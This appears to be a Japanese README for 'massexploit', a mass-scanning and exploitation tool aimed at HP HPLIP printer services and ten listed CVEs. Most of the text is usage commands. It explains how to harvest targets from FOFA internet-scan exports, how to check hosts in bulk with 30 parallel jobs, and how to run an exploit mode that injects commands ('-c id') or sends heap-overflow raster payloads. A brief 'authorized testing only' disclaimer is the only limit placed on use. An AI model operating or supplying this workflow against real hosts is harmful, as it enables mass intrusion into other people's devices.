massexploit — HP HPLIP 大量 CVE チェッカー (2026-09)
HP HPLIP < 3.26.6 向けの大量チェックおよび研究用エクスプロイトドライバ — CVE-2026-91097 から CVE-2026-91106。
| CVE | CVSS 4 | CWE | リモート |
|---|
| CVE-2026-91097 | 7.0 | CWE-787 | はい (UI) |
| CVE-2026-91098 | 8.6 | CWE-122 | はい (UI) |
| CVE-2026-91099 | 5.1 | CWE-61 | ローカル |
| CVE-2026-91100 | 6.8 | CWE-78 | ローカル |
| CVE-2026-91102 | 8.4 | CWE-78 | ローカル |
| CVE-2026-91101 | 5.1 | CWE-129 | 物理 |
| CVE-2026-91103 | 5.1 | CWE-191 | 物理 |
| CVE-2026-91104 | 9.3 | CWE-122 | はい |
| CVE-2026-91105 | 8.6 | CWE-122 | はい (UI) |
| CVE-2026-91106 | 9.3 | CWE-122 | はい |
修正済み: HPLIP 3.26.6+
概要
FOFA body="hplip" のヒットは多くの場合 :8000 PAPPL であり、:2207 ではない。ターゲットリストでは host:port を使用すること。
スクリーンショット (--flow 大量チェック)

要件
- Python 3.9+
pip install -r requirements.txt
使用方法
pip install -r requirements.txt
# Single target (default ports 631, 2207, 9100 if no port given)
python poc.py -u 192.0.2.10 --mode check
# FOFA port (recommended)
python poc.py -u 192.0.2.10:8000 --mode check --flow
# Mass — all 10 CVEs
python poc.py --list targets.example.txt --mode check -j 30 -q --flow
# Critical network heap CVEs only
python poc.py --list list_hplip_printer.txt --mode check --cve CVE-2026-91104,CVE-2026-91106
# Exploit research (PAPPL on :8000 → IPP raster; -c id only meaningful on hpssd:2207)
python poc.py -u 192.0.2.10:8000 --mode exploit --cve CVE-2026-91106
python poc.py -u 192.0.2.10:2207 --mode exploit --cve CVE-2026-91100 -c id
FOFA → ターゲットリスト
# Save export as fofa_csv_1049.csv (or pass -i)
python fofa_to_list.py
# list.txt (all) + list_hplip_printer.txt (title hint = HPLIP Printer Application)
python poc.py --list list_hplip_printer.txt --mode check -j 30 --flow
ターゲットリスト形式
192.0.2.10:8000
192.0.2.11:2207
192.0.2.12|CVE-2026-91106
|CVE… を含む行では、| の前の部分をホストとして使用する (ヒット出力用のオプションの CVE ヒント)。
CLI
出力
| ファイル | 内容 |
|---|
massexploit_results.jsonl | ホストごとの完全な JSON |
hits.txt | 候補 (host|cve,…) |
一般的な check の status 値
| ステータス | 意味 |
|---|
hplip_surface_candidate | 開いているポート + バージョン/CVE マッピング |
network_surface_version_unknown | TCP オープン、HPLIP/PAPPL の可能性が高い、バージョン不明 |
エクスプロイトの期待値
| ステータス | 意味 |
|---|
pappl_raster_sent_no_shell_output | PAPPL ポートで IPP/ラスターを送信; HTTP に id なし (ヒープ RCE クラス) |
exploit_attempted_no_confirm | 試行は行われたが検証なし |
|
リポジトリ構成
.
├── poc.py
├── cve_catalog.py
├── hplip_probes.py
├── hplip_exploit.py
├── pappl_ipp.py
├── pappl_raster.py
├── fofa_to_list.py
├── image.png
├── targets.example.txt
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
制限事項
- 汎用 Web スキャナーではない — 印刷 / HPLIP TCP+HTTP サーフェス向け。
- PAPPL 上の 91104/91106 に対する公開された武器化された RCE は存在しない; ラスターパスは ZDI-26-656 に沿った研究である。
- 物理/ローカル CVE は
--cve all にリストされているが、大規模にリモートから悪用可能ではない。
- 許可されたテストのみ。
参考文献
法的注意
許可されたセキュリティテストのみを目的とする。適用される法律およびプログラム規則の遵守はあなたの責任である。